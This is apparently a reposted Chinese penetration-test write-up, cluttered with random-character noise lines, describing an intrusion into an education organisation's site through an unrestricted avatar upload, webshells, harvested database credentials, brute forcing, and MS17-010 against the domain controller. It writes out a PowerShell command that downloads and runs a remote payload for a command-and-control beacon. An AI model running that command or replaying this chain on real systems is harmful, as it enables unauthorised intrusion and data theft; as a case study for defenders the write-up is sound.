}& J4 \9 J, v% x, {$ p
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路( b- E6 u; N) T; {
* A! z, _' \% B, n
' |9 W N, i ~4 n4 D0 G5 S
0 ?) d0 N% x/ i' s7 G4 Q
/ M3 @/ |- f, n
, p( q) P0 a1 p1 X* v q 正文. _. D2 P, C% ]
. d& C" l% r) x. ?1 i/ Z* p( \
5 X8 `* K; c0 y" h6 N/ x 5 D7 M, e+ T2 P
9 t+ o; Z: X5 k3 V H# w6 i
! w; I$ A, n6 Z. ? 目标:www.xxxx.com(一家教育机构) ( R- T- H0 M- y2 y! b7 ^1 M
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
1 f( |" Z; `/ A5 B; `4 _; i! A/ u
. d4 n: o/ l8 }6 [
+ x; c t0 `! E; @ 3 ^ F$ n* y3 R( |! K ~
3 E; k6 F) `9 J1 F8 f
4 r! {$ k" s- K 进行了简单的信息搜集
& O U0 `+ L4 b ( n) X" C4 _$ Q6 m' q) S8 D/ o
( O; z, ?" i4 E% W! r. z - v6 U8 H1 k! b" d
" ?; v; a; J" m. M6 r) g4 J# L2 _ 子域名搜集
' P. ?, |) M7 q7 w0 M
) _$ M) B8 P/ ~
5 g0 K5 \% ^- G* p' m1 v/ Q/ p9 Z8 `
8 ]) ~( k" V {, J/ i. n! G7 }. J
4 C6 [5 I: z( o2 ?5 f4 T' p0 K& ?0 H5 Z5 a: |9 D! ^0 T: X; Z3 V
fofa找资产 " V; b7 Q! {/ q; i3 n$ n
b7 F* g& P* K. g6 @1 X8 k$ v {; J! k3 C
9 d% p7 C% ?: o) V# g6 }6 v6 _
: K4 Z0 G; [# f: {& f
* ^) Y2 r' Y: J4 R
: q S1 p8 E! x0 ~0 w8 E
6 `5 m- i( T3 F- h- | 一共七个资产。去重之后只有两个。
/ Y0 V. M- Q$ }5 m1 B' ~! u ; f/ e3 W+ F0 v; h
' x4 h' | ~+ H3 v( \; s
& p, ^& o4 D3 J- Z* ?/ y
3 o" x- c. b: ] 目录探测' J7 P: f. `* f+ @5 g0 j4 |
$ ^- F/ L8 Q( ?( }: b! \- ]
+ h1 U# k, P: y8 _( Q% r
; B/ F% F/ b9 S ( ~& h: M9 g2 M5 y: a0 e9 [
( Y$ z2 a# E1 `" k0 t* i r
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 # e6 ~' a# |9 j+ x, D
* J1 w3 g8 _% ~" D4 K* {
% S6 g* n& I( d- H# I$ c+ u2 o
/ C. m8 c; V3 ?) l% i& M) ^" K( C
4 q- o5 d& e5 V4 |4 d
我又尝试了通过修改返回包来绕过登录界面
N9 t: `; t, T: a% d2 Y. a
2 `+ [3 L7 ^# N3 `' g7 b
. o4 Y% o% J9 n0 R) z
3 U8 _3 G& [; p% P
! u N0 A1 M& z0 @2 M: l- y6 w+ x' V7 U$ G+ {' ~
还是不行,尝试注入无果& l) L% m; P7 B3 i* k+ U, i1 n
0 M; w- V: m* G3 o, w& B
( e4 @5 `2 O6 B# { . s6 S7 T7 j, e& L0 J% X
" R. |2 F! R' Z. |. X3 ~
: v/ u& J$ c. g
不过我目录探测出了一处Spring信息泄露
5 ?- u2 e, |$ c) S& ~3 m
- x& }6 N# a. q/ q. n) D
, H& w& t5 k% b5 Z) p + y& X! i7 r6 d( |8 [6 i. K4 X/ W
% u7 h$ _6 F' ]6 ?5 P. o 9 F" ]: \3 W! e# d; C( S" l
6 e: v3 |# K: J" A; _
4 }+ B( @6 }1 {' Z9 Y% E 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录6 T Z9 H- b9 e( z z' w& g
0 B) u! o) T! h" d V2 S' j d7 P9 u7 P$ S/ j% ]
" q0 T- C' L5 n2 }) }2 F
: o7 Z% w3 l9 D! I
$ K( `; I& I. [! \$ R4 s. } 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, Z2 n' s& } O; E% L h( v $ ?% L% I% K6 {1 [
. K' }0 ]7 A8 ]8 b; B3 { |- I
p/ t s. O' v/ H
! o2 z* j1 }% l8 H, z' Q. X* H0 s; E
获取有些师傅到这一步就手机抓包电脑测了。
$ Q( H& L, N! V' K# a3 P$ B6 r 1 a' K% T" W. x6 x1 N& I8 t0 E
& e3 u: w# v; J- C0 | q4 ~! i Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
: v4 \: |( k" X$ S6 \; D
7 g- {' O, k ~/ j4 ~
- r. y# j0 k2 B 其中在一个公众号发现了小程序,可以进行注册。
/ K. C3 i7 c( b0 G! v" p: U$ u 8 V% {& j( o) f6 N1 }6 z; p
) f2 |! ]4 m# l% i7 g
看到了头像上传,尝试上传获取WebShell" |9 l- x/ C$ G3 M) i2 o" |, E
/ c) X- ?1 b$ u, P
$ y7 l' L" y- v- k' V! o
( }! \9 e' l; a3 k* e7 m" {/ _. v
1 ^, b) s% T( w2 f( m5 U5 x; q% k% x* V, _2 z' y: ]! P! |" a) ^
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
# g1 j \( l" x* Y- Y, i2 Q ; O+ a5 I; r" |) T# A) }' E
7 O/ ~" z6 c; y! q. P$ \
4 @9 j; M: u# K
& c: X" |. n1 Z8 y( f# x4 V* H
3 B" M+ n y# Z. n# ` 然后上了大马
0 J) X; G" Y( g# L 6 }$ F) P" d/ _5 i& f. {
, a8 o5 f$ y- F# v$ ^7 p" @
1 {4 G- F+ C2 m: `
2 ~+ ?& h" p" K1 _
4 o7 G* K) X# ]- Q1 {. W- S 8 j5 H% R( T7 Q1 p
4 C) ~6 M7 S) D- \! P% _
7 H: j; v6 H9 I2 B
通过翻找文件发现数据库账号密码
. i! M1 s( ~* w# O; e3 l9 F 5 d- x& T8 I* R# S0 s
- D9 ^! X' R, M8 l5 k* B/ Q. a 1 X9 b) o( U$ Q6 s, q
. ^7 F% i' a/ a
0 _5 e5 M9 h6 W x --内网渗透. `; C2 Z5 V x( }" X n
9 V( q7 X5 M! q
6 n# X5 H1 }( l 直接通过powershell执行 cs上线7 y8 b( Q& Y8 O7 j1 y9 _
7 _9 ]) D ], g
# u, [! a' L' E" ]) u* }, }& i3 z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"* c H& [# ^# g1 @( M9 n& Z' J
% q/ t( R1 O9 [
. L4 |. f( L% x- K# ~/ W- Q4 a , z3 U* [4 S* j/ ]8 E/ g+ R4 [
# [. R, K+ b; E( ^3 I; ]: O; \
+ N1 F( }: j# t6 R6 `: ~1 a
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
% d- K0 a0 g! n2 `) Y $ B: _( ]1 ^ H& X9 d, `
$ u" Y) h. e. g# y
5 ^: o$ M+ R7 W0 R1 {
& ^" u- }( H! M2 F6 {$ C2 s6 A; o! \
; [0 E# w6 H0 c9 r5 Z' N
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 3 w! |$ J" Q- u, `
- f# o% K' u: v' \; d
& i# \, ]1 n' h$ c% Q: O; f5 Z9 r5 `( u
7 R% n! `6 R3 V. H" Y+ }+ {
8 M/ X9 I9 M8 R$ d4 L* R6 q* R& U
/ Y$ o7 ]" I, o# M/ r; h2 L( G! V + h! N& y/ T8 b. ?+ n* X9 w
, `& }. |% C" [ 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
% T. I- G, M! x( n' M# [. v. a2 V* ~
* A. k/ q8 Q+ `, R2 W
& u, {7 U Q6 i6 B / f9 [8 O6 _+ w0 m% y y$ g
7 W6 O$ n* N, ~3 E" i
3 @) I5 A9 h ]. S; t6 e; e. G* w1 z
* `& i( p- A- o
+ ~4 o" |+ C) f$ D, f( ~% {
6 ?' ?4 F7 x! U9 G $ a) R$ r7 a' n$ S8 `6 F% X
# A) I/ ]! j% K% @2 a+ E% O* Q
8 Q! O5 O: @- B ?; X
* i7 L' {8 ?& N, i1 T V. G
% B" v9 m- z' S3 l0 l6 k 2 }; n* X. k8 G) F$ e
1 ^& }- d7 h2 U3 d+ U! L 小结8 d) n) q( }4 w
7 c+ _" Y) U. K+ Q1 n5 {
8 o' @5 c) }. b7 e
2 `" G. S. ^5 `1 o1 _4 f
& I4 L+ c4 z& Y$ J
6 T$ J* L: k( E7 l4 C 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! _8 |0 v3 n F; @
* j# ?0 l& ]) Z: y; U
7 |5 X& ]9 M( C4 }3 j% m i8 B
S) u) ~5 O3 f2 z4 @+ ] ( C* T, I& p u! E7 l0 P: q; }2 Q o
" d" R2 S5 k& J, ]7 } k4 s9 Z - 9 F( R4 u9 j) ^: E( P. h
/ f! {, M! o% f* b
4 w( W1 a: M6 K& ]
- " @7 G( N- s0 B6 @: ~& X
1 b0 {! T8 X- Z: L
|- m2 M' u& L& H
% O1 d: d/ Y: p+ Z
3 D0 S; y' u; t. t, r 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html1 A, T* q4 y1 |: U+ i
' A/ k N# S8 m4 j" D' Q2 f; Z" S
) J! X" q# L5 E: f& d7 ~
' I7 D; l* e B8 E$ m0 {: n |